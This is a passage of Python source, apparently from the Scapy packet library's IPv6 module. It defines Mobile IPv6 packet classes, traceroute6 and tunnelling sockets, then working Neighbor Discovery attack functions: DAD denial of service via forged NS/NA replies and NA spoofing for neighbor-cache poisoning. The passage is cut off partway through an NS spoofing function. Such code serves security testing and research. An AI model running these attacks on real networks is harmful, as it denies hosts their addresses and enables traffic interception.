    x, y = 0, 0
3106
3107
class MIP6OptCareOfTest(_MIP6OptAlign):  # RFC 4866 (Sect. 5.5)
    """Mobility option of type 16: ``olen`` bytes of ``cokt``.

    The default ``cokt`` value is 8 null bytes.
    """

    name = "MIPv6 option - Care-of Test"
    fields_desc = [
        ByteEnumField("otype", 16, _mobopttypes),
        FieldLenField("olen", None, length_of="cokt", fmt="B"),
        StrLenField("cokt", b'\x00' * 8,
                    length_from=lambda opt: opt.olen),
    ]
    # alignment requirement: none
    x, y = 0, 0
3116
3117
class MIP6OptUnknown(_MIP6OptAlign):
    """Generic mobility option: type, length and ``olen`` bytes of data.

    Its ``dispatch_hook`` selects the class registered in ``moboptcls`` for
    the option type found in the first byte, and falls back to this class
    when the type is not registered or no raw data is given.
    """

    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        FieldLenField("olen", None, length_of="odata", fmt="B"),
        StrLenField("odata", "",
                    length_from=lambda opt: opt.olen),
    ]
    # alignment requirement: none
    x, y = 0, 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        if not _pkt:
            return cls
        # First byte of the raw option is its type
        return moboptcls.get(orb(_pkt[0]), cls)
3134
3135
# Mobility option type -> class used to dissect it
moboptcls = {
    0: Pad1,
    1: PadN,
    2: MIP6OptBRAdvice,
    3: MIP6OptAltCoA,
    4: MIP6OptNonceIndices,
    5: MIP6OptBindingAuthData,
    6: MIP6OptMobNetPrefix,
    7: MIP6OptLLAddr,
    8: MIP6OptMNID,
    9: MIP6OptMsgAuth,
    10: MIP6OptReplayProtection,
    11: MIP6OptCGAParamsReq,
    12: MIP6OptCGAParams,
    13: MIP6OptSignature,
    14: MIP6OptHomeKeygenToken,
    15: MIP6OptCareOfTestInit,
    16: MIP6OptCareOfTest,
}
3153
3154
3155# Main Mobile IPv6 Classes
3156
# Mobility Header type -> short name
mhtypes = {
    0: 'BRR',
    1: 'HoTI',
    2: 'CoTI',
    3: 'HoT',
    4: 'CoT',
    5: 'BU',
    6: 'BA',
    7: 'BE',
    8: 'Fast BU',
    9: 'Fast BA',
    10: 'Fast NA',
}
3168
3169# From http://www.iana.org/assignments/mobility-parameters
# Binding Acknowledgement status code -> description
bastatus = {
    0: 'Binding Update accepted',
    1: 'Accepted but prefix discovery necessary',
    128: 'Reason unspecified',
    129: 'Administratively prohibited',
    130: 'Insufficient resources',
    131: 'Home registration not supported',
    132: 'Not home subnet',
    133: 'Not home agent for this mobile node',
    134: 'Duplicate Address Detection failed',
    135: 'Sequence number out of window',
    136: 'Expired home nonce index',
    137: 'Expired care-of nonce index',
    138: 'Expired nonces',
    139: 'Registration type change disallowed',
    140: 'Mobile Router Operation not permitted',
    141: 'Invalid Prefix',
    142: 'Not Authorized for Prefix',
    143: 'Forwarding Setup failed (prefixes missing)',
    144: 'MIPV6-ID-MISMATCH',
    145: 'MIPV6-MESG-ID-REQD',
    146: 'MIPV6-AUTH-FAIL',
    147: 'Permanent home keygen token unavailable',
    148: 'CGA and signature verification failed',
    149: 'Permanent home keygen token exists',
    150: 'Non-null home nonce index expected',
}
3195
3196
class _MobilityHeader(Packet):
    """Common base of the Mobility Header messages.

    It provides the ``post_build`` step that fills in the length byte and
    the checksum when they were left to ``None``.
    """

    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """Return header plus payload with length and checksum patched in.

        The length byte (offset 1) is computed from the total size when
        ``self.len`` is ``None``; the checksum (offsets 4-5) is computed
        with ``in6_chksum`` when ``self.cksum`` is ``None``.
        """
        data = p + pay

        hdr_len = self.len
        if hdr_len is None:
            # Unit is 8 bytes, the first 8 bytes are not counted
            hdr_len = (len(data) - 8) // 8
        data = data[:1] + struct.pack("B", hdr_len) + data[2:]

        cksum = self.cksum
        if cksum is None:
            cksum = in6_chksum(135, self.underlayer, data)
        return data[:4] + struct.pack("!H", cksum) + data[6:]
3213
3214
class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
    """Mobility Header with an opaque ``msg`` body.

    ``len`` is expressed in units of 8 bytes and does not count the first
    8 bytes of the header (see ``_MobilityHeader.post_build``). As the fixed
    fields below take 6 bytes, ``msg`` holds ``8 * len + 8 - 6`` bytes, i.e.
    ``8 * len + 2``. The former ``8 * len - 6`` was negative for ``len`` 0,
    which made the dissection of a default-built packet lose its ``msg``.
    """

    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteEnumField("mhtype", None, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   StrLenField("msg", b"\x00" * 2,
                               length_from=lambda pkt: 8 * pkt.len + 2)]
3224
3225
class MIP6MH_BRR(_MobilityHeader):
    """Mobility Header of type 0 (Binding Refresh Request)."""

    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 0, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("res2", None),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], MIP6OptUnknown, 8,
                      length_from=lambda mh: 8 * mh.len),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        # Hack: BRR, BU and BA all return this very same constant, because
        # a BA has to be matched with a BU and a BU with a BRR. --arno
        return b"\x00\x08\x09"
3244
3245
class MIP6MH_HoTI(_MobilityHeader):
    """Mobility Header of type 1 (Home Test Init), keyed by its cookie."""

    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 1, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrFixedLenField("reserved", b"\x00" * 2, 2),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], MIP6OptUnknown, 16,
                      length_from=lambda mh: 8 * (mh.len - 1)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Use the cookie as hash so that request and reply match."""
        cookie = self.cookie
        return bytes_encode(cookie)
3262
3263
class MIP6MH_CoTI(MIP6MH_HoTI):
    """Same layout as ``MIP6MH_HoTI`` with ``mhtype`` set to 2."""

    name = "IPv6 Mobility Header - Care-of Test Init"
    mhtype = 2

    def hashret(self):
        """Use the cookie as hash so that request and reply match."""
        cookie = self.cookie
        return bytes_encode(cookie)
3270
3271
class MIP6MH_HoT(_MobilityHeader):
    """Mobility Header of type 3 (Home Test): index, cookie and token."""

    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 3, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("index", None),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        StrFixedLenField("token", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda mh: 8 * (mh.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Use the cookie as hash so that request and reply match."""
        cookie = self.cookie
        return bytes_encode(cookie)

    def answers(self, other):
        """Return 1 when *other* is a HoTI carrying the same cookie."""
        if not isinstance(other, MIP6MH_HoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0
3295
3296
class MIP6MH_CoT(MIP6MH_HoT):
    """Same layout as ``MIP6MH_HoT`` with ``mhtype`` set to 4."""

    name = "IPv6 Mobility Header - Care-of Test"
    mhtype = 4

    def hashret(self):
        """Use the cookie as hash so that request and reply match."""
        cookie = self.cookie
        return bytes_encode(cookie)

    def answers(self, other):
        """Return 1 when *other* is a CoTI carrying the same cookie."""
        if not isinstance(other, MIP6MH_CoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0
3309
3310
class LifetimeField(ShortField):
    """16-bit field whose representation is its value times 4, in sec."""

    def i2repr(self, pkt, x):
        seconds = 4 * x
        return "%d sec" % seconds
3314
3315
class MIP6MH_BU(_MobilityHeader):
    """Mobility Header of type 5 (Binding Update)."""

    name = "IPv6 Mobility Header - Binding Update"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 5, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        # TODO: ShortNonceField
        XShortField("seq", None),
        FlagsField("flags", "KHA", 7, "PRMKLHA"),
        XBitField("reserved", 0, 9),
        # unit == 4 seconds
        LifetimeField("mhtime", 3),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda mh: 8 * mh.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 when *other* is a Binding Refresh Request."""
        return 1 if isinstance(other, MIP6MH_BRR) else 0
3339
3340
class MIP6MH_BA(_MobilityHeader):
    """Mobility Header of type 6 (Binding Acknowledgement)."""

    name = "IPv6 Mobility Header - Binding ACK"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
                   ByteEnumField("mhtype", 6, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   ByteEnumField("status", 0, bastatus),
                   FlagsField("flags", "K", 3, "PRK"),
                   XBitField("res2", None, 5),
                   XShortField("seq", None),  # TODO: ShortNonceField
                   XShortField("mhtime", 0),  # unit == 4 seconds
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
                   _OptionsField("options", [], MIP6OptUnknown, 12,
                                 length_from=lambda pkt: 8 * pkt.len - 4)]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 when this BA acknowledges the Binding Update *other*.

        *other* must be a BU (mhtype 5) whose Acknowledge flag is set and
        whose sequence number equals the one of this BA (mhtype 6).
        """
        # Flag names are listed least significant bit first, so in the BU
        # flags "PRMKLHA" the 'A' (Acknowledge) flag is bit 6. The former
        # mask 0x1 tested the 'P' flag instead, which made a BA never match
        # a BU built with the default "KHA" flags.
        bu_ack_flag = 0x40

        if not isinstance(other, MIP6MH_BU):
            return 0
        if other.mhtype != 5 or self.mhtype != 6:
            return 0
        if not (other.flags & bu_ack_flag):
            return 0
        return 1 if self.seq == other.seq else 0
3369
3370
3371_bestatus = {1: 'Unknown binding for Home Address destination option',
3372 2: 'Unrecognized MH Type value'}
3373
3374# TODO: match Binding Error to its stimulus
3375
3376
class MIP6MH_BE(_MobilityHeader):
    """Mobility Header of type 7 (Binding Error): status and an address."""

    name = "IPv6 Mobility Header - Binding Error"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 7, mhtypes),
        ByteField("res", 0),
        XShortField("cksum", None),
        ByteEnumField("status", 0, _bestatus),
        ByteField("reserved", 0),
        IP6Field("ha", "::"),
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda mh: 8 * (mh.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}
3390
3391
# Mobility Header type -> class implementing that message
_mip6_mhtype2cls = {
    0: MIP6MH_BRR,
    1: MIP6MH_HoTI,
    2: MIP6MH_CoTI,
    3: MIP6MH_HoT,
    4: MIP6MH_CoT,
    5: MIP6MH_BU,
    6: MIP6MH_BA,
    7: MIP6MH_BE,
}
3400
3401
3402#############################################################################
3403#############################################################################
3404# Traceroute6 #
3405#############################################################################
3406#############################################################################
3407
class AS_resolver6(AS_resolver_riswhois):
    """RIS whois AS resolver that also copes with 6to4 and Teredo."""

    def _resolve_one(self, ip):
        """
        Resolve the AS of *ip* and return ``(ip, asn, desc)``.

        For a 6to4 or a Teredo address the lookup is done on the IPv4
        address it embeds; any other address is looked up as is. When the
        AS string starts with "AS" and the rest is a number, ``asn`` is
        returned as an int.
        """
        if in6_isaddr6to4(ip):
            # 6to4: the IPv4 address sits in bytes 2 to 5
            packed = inet_pton(socket.AF_INET6, ip)
            lookup = inet_ntop(socket.AF_INET, packed[2:6])
        elif in6_isaddrTeredo(ip):
            # Teredo: use the mapped address
            lookup = teredoAddrExtractInfo(ip)[2]
        else:
            lookup = ip

        _, asn, desc = AS_resolver_riswhois._resolve_one(self, lookup)

        if asn.startswith("AS"):
            try:
                asn = int(asn[2:])
            except ValueError:
                # Not a number after the prefix: keep the string as is
                pass

        return ip, asn, desc
3433
3434
class TracerouteResult6(TracerouteResult):
    """IPv6 flavour of ``TracerouteResult``."""

    __slots__ = []

    def show(self):
        """Build a table of the results, one cell per (probe, answer)."""
        # TODO: ICMPv6 !
        sent_fmt = "%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"  # noqa: E501
        recv_fmt = ("%-42s,IPv6.src% {TCP:%TCP.flags%}"
                    "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"  # noqa: E501
                    "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"  # noqa: E501
                    "{ICMPv6EchoReply:%ir,type%}")

        def cell(s, r):
            return (s.sprintf(sent_fmt), s.hlim, r.sprintf(recv_fmt))

        return self.make_table(cell)

    def get_trace(self):
        """Return ``{dst: {hlim: (answering source, final)}}``.

        ``final`` is False when the answer holds one of the ICMPv6 error
        layers listed below. For each destination, the hops located after
        the first final answer are dropped.
        """
        error_layers = (ICMPv6TimeExceeded, ICMPv6DestUnreach,
                        ICMPv6PacketTooBig, ICMPv6ParamProblem)
        trace = {}

        for snd, rcv in self.res:
            if IPv6 not in snd:
                continue
            hops = trace.setdefault(snd[IPv6].dst, {})
            final = not any(layer in rcv for layer in error_layers)
            hops[snd[IPv6].hlim] = rcv[IPv6].src, final

        for hops in trace.values():
            finals = [hlim for hlim, info in hops.items() if info[1]]
            if not finals:
                continue
            last = min(finals)
            for hlim in list(hops):  # use list(): hops is modified below
                if hlim > last:
                    del hops[hlim]

        return trace

    def graph(self, ASres=AS_resolver6(), **kargs):
        """Call ``TracerouteResult.graph`` with an IPv6 aware resolver."""
        TracerouteResult.graph(self, ASres=ASres, **kargs)
3476
3477
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
                l4=None, timeout=2, verbose=None, **kargs):
    """Instant TCP traceroute using IPv6

    traceroute6(target, [maxttl=30], [dport=80], [sport=80])

    One probe is sent per hop limit between minttl and maxttl. Probes are
    TCP segments unless l4 is given, in which case l4 is used as payload
    of the IPv6 header. The answered probes, wrapped in a
    TracerouteResult6, and the unanswered ones are returned as a pair.
    """
    if verbose is None:
        verbose = conf.verb

    base = IPv6(dst=target, hlim=(minttl, maxttl))
    if l4 is None:
        probes = base / TCP(seq=RandInt(), sport=sport, dport=dport)
        answered, unanswered = sr(probes, timeout=timeout,
                                  filter="icmp6 or tcp",
                                  verbose=verbose, **kargs)
    else:
        answered, unanswered = sr(base / l4, timeout=timeout,
                                  verbose=verbose, **kargs)

    result = TracerouteResult6(answered.res)
    if verbose:
        result.show()

    return result, unanswered
3500
3501#############################################################################
3502#############################################################################
3503# Sockets #
3504#############################################################################
3505#############################################################################
3506
3507
if not WINDOWS:
    from scapy.supersocket import L3RawSocket

    class L3RawSocket6(L3RawSocket):
        """L3 raw socket sending through AF_INET6 / IPPROTO_RAW."""

        def __init__(self, type=ETH_P_IPV6, filter=None, iface=None,
                     promisc=None, nofilter=0):
            # NOTE: if fragmentation is needed, it will be done by the
            # kernel (RFC 2292)
            self.outs = socket.socket(
                socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW
            )
            self.ins = socket.socket(
                socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)
            )
            self.iface = iface
3517
3518
def IPv6inIP(dst='203.178.135.36', src=None):
    """Configure the ``_IPv6inIP`` class and return it.

    *dst* and *src* are stored on the class. When ``conf.L3socket`` is not
    ``_IPv6inIP`` yet, it is remembered as ``_IPv6inIP.cls``; otherwise
    ``conf.L3socket`` is deleted.
    """
    _IPv6inIP.dst, _IPv6inIP.src = dst, src
    if conf.L3socket == _IPv6inIP:
        del conf.L3socket
    else:
        _IPv6inIP.cls = conf.L3socket
    return _IPv6inIP
3527
3528
class _IPv6inIP(SuperSocket):
    """Socket wrapping IPv6 packets in IP (proto IPPROTO_IPV6).

    The actual traffic goes through ``worker``, an instance of ``cls``.
    ``dst``, ``src`` and ``cls`` are class attributes shared by instances.
    """

    dst = '127.0.0.1'
    src = None
    cls = None

    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM,
                 proto=0, **args):
        SuperSocket.__init__(self, family, type, proto)
        self.worker = self.cls(**args)

    def set(self, dst, src=None):
        """Change the tunnel endpoints for the whole class."""
        _IPv6inIP.src = src
        _IPv6inIP.dst = dst

    def nonblock_recv(self):
        return self._recv(self.worker.nonblock_recv())

    def recv(self, x):
        return self._recv(self.worker.recv(x), x)

    def _recv(self, p, x=MTU):
        """Return the inner IPv6 packet of *p* when it comes from ``dst``.

        Anything else (``None`` included) is returned unchanged.
        """
        if p is None:
            return p
        # TODO: verify checksum
        tunnelled = (isinstance(p, IP) and
                     p.src == self.dst and
                     p.proto == socket.IPPROTO_IPV6 and
                     isinstance(p.payload, IPv6))
        return p.payload if tunnelled else p

    def send(self, x):
        """Send *x* through the worker, inside an IP header."""
        outer = IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)
        return self.worker.send(outer / x)
3562
3563
3564#############################################################################
3565#############################################################################
3566# Neighbor Discovery Protocol Attacks #
3567#############################################################################
3568#############################################################################
3569
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
                        tgt_filter=None, reply_mac=None):
    """
    Internal generic helper accepting a specific callback as first argument,
    for NS or NA reply. See the two specific functions below.

    reply_callback: called as reply_callback(req, reply_mac, iface) for
        each sniffed packet accepted by is_request().

    iface: interface to sniff on; conf.iface is used when not provided.

    mac_src_filter: when set, only requests whose Ethernet source is that
        address are considered.

    tgt_filter: when set, only requests whose NS target is that IPv6
        address are considered. A textual address (str) is converted to
        its packed form before being compared; a bytes value is taken as
        an already packed address.

    reply_mac: source mac address handed to the callback; the address of
        iface is used when not provided.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        # Get and compare the MAC address
        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must be the unspecified address
        if req[IPv6].src != "::":
            return 0

        # Check destination is the link-local solicited-node multicast
        # address associated with target address in received NS
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0
        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
        expected_snma = in6_getnsma(tgt)
        if received_snma != expected_snma:
            return 0

        return 1

    if not iface:
        iface = conf.iface

    # is_request() compares the filter with the packed form of the target.
    # A textual filter was formerly compared as is, never matched and thus
    # silently disabled every reply: convert it once, here.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, iface),
          iface=iface)
3620
3621
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756. Incoming NS messages sent from the unspecified address are
    listened for, and a NS is sent back for the same target address, which
    leads the peer to believe that another node is also performing DAD for
    that address.

    By default, the fake NS sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the unspecified address (::).
     - as IPv6 destination address: the link-local solicited-node multicast
       address derived from the target address in received NS.
     - the mac address of the interface as source (or reply_mac, see below).
     - the multicast mac address derived from the solicited node multicast
       address used as IPv6 destination address.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.
    """

    def ns_reply_callback(req, reply_mac, iface):
        """
        Answer the NS held by req with a look-alike NS
        """

        requester_mac = req[Ether].src
        ns_dst = req[IPv6].dst
        target = req[ICMPv6ND_NS].tgt

        # Same destination and same target as the request, from "::"
        fake_ns = (Ether(src=reply_mac) /
                   IPv6(src="::", dst=ns_dst) /
                   ICMPv6ND_NS(tgt=target))
        sendp(fake_ns, iface=iface, verbose=0)

        print("Reply NS for target address %s (received from %s)" % (target, requester_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3676
3677
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756. Incoming NS messages *sent from the unspecified address* are
    listened for, and a NA is sent back for the target address, which
    leads the peer to believe that another node already owns that address.

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address found in received NS.
     - as IPv6 destination address: the link-local solicited-node multicast
       address derived from the target address in received NS.
     - the mac address of the interface as source (or reply_mac, see below).
     - the multicast mac address derived from the solicited node multicast
       address used as IPv6 destination address.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
       with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.
    """

    def na_reply_callback(req, reply_mac, iface):
        """
        Answer the NS held by req with a NA
        """

        requester_mac = req[Ether].src
        ns_dst = req[IPv6].dst
        target = req[ICMPv6ND_NS].tgt

        # NA sourced from the target itself, with our mac as link-layer
        # address option
        fake_na = (Ether(src=reply_mac) /
                   IPv6(src=target, dst=ns_dst) /
                   ICMPv6ND_NA(tgt=target, S=0, R=0, O=1) /  # noqa: E741
                   ICMPv6NDOptDstLLAddr(lladdr=reply_mac))
        sendp(fake_na, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (target, requester_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3737
3738
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
                           reply_mac=None, router=False):
    """
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor Advertisement
    is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function send
    advertisements in response to received NS (NS sent as part of the DAD,
    i.e. with an unspecified address as source, are not considered).

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address
     - as IPv6 destination address: the source IPv6 address of received NS
       message.
     - the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination macs address
       of the emitted NA.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
       filled with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS. A textual
         address (str) is converted to its packed form before being
         compared; a bytes value is taken as an already packed address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.

    router: by the default (False) the 'R' flag in the NA used for the reply
         is not set. If the parameter is set to True, the 'R' flag in the
         NA is set, advertising us as a router.

    Please, keep the following in mind when using the function: for obvious
    reasons (kernel space vs. Python speed), when the target of the address
    resolution is on the link, the sender of the NS receives 2 NA messages
    in a row, the valid one and our fake one. The second one will overwrite
    the information provided by the first one, i.e. the natural latency of
    Scapy helps here.

    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come after
    something 20+ ms. On a usual testbed for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must NOT be the unspecified address
        if req[IPv6].src == "::":
            return 0

        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0

        dst = req[IPv6].dst
        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.

            # If this is a real address resolution NS, then the destination
            # address of the packet is the link-local solicited node multicast
            # address associated with the target of the NS.
            # Otherwise, the NS is a NUD related one, i.e. the peer is
            # unicasting the NS to check the target is still alive (L2
            # information is still in its cache and it is verified)
            received_snma = inet_pton(socket.AF_INET6, dst)
            expected_snma = in6_getnsma(tgt)
            if received_snma != expected_snma:
                print("solicited node multicast @ does not match target @!")
                return 0

        return 1

    def reply_callback(req, reply_mac, router, iface):
        """
        Callback that reply to a NS with a spoofed NA
        """

        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
        # send it back.
        mac = req[Ether].src
        pkt = req[IPv6]
        src = pkt.src
        tgt = req[ICMPv6ND_NS].tgt
        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
        # Use the target field from the NS
        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741

        # "If the solicitation IP Destination Address is not a multicast
        # address, the Target Link-Layer Address option MAY be omitted"
        # Given our purpose, we always include it.
        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)

        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, mac))

    if not iface:
        iface = conf.iface

    # is_request() compares the filter with the packed form of the target.
    # A textual filter was formerly compared as is, never matched and thus
    # silently disabled every reply: convert it once, here.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    router = 1 if router else 0  # Value of the R flags in NA

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, router, iface),
          iface=iface)
3875
3876
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
                           dst=None, src_mac=None, dst_mac=None, loop=True,
                           inter=1, iface=None):
    """
    Emit forged Neighbor Solicitation (NS) messages towards a victim so that
    it creates, or updates, an entry of its neighbor cache. Section 7.2.3 of
    RFC 4861 states that a node SHOULD create the entry or update an existing
    one (unless it is currently performing DAD for the target of the NS); the
    reachability state of the entry is then set to STALE.

    What ends up in the victim's cache is driven by two values: the source
    link-layer address (carried by the Source Link-Layer Address option of
    the NS) and the IPv6 source address of the packet.

    Contrary to some other NDP_Attack_* functions, nothing is sniffed here:
    there is no stimulus/response logic. The very same NS packet is simply
    sent in loop, every second by default.

    The packet can be tuned with the following arguments:

    src_lladdr: MAC address placed in the Source Link-Layer Address option
                of the NS, i.e. the address the peer should bind to the IPv6
                source address of the packet in its neighbor cache. When
                None, the MAC address of the interface is used.

    src: IPv6 source address of the packet. When None, an address of the
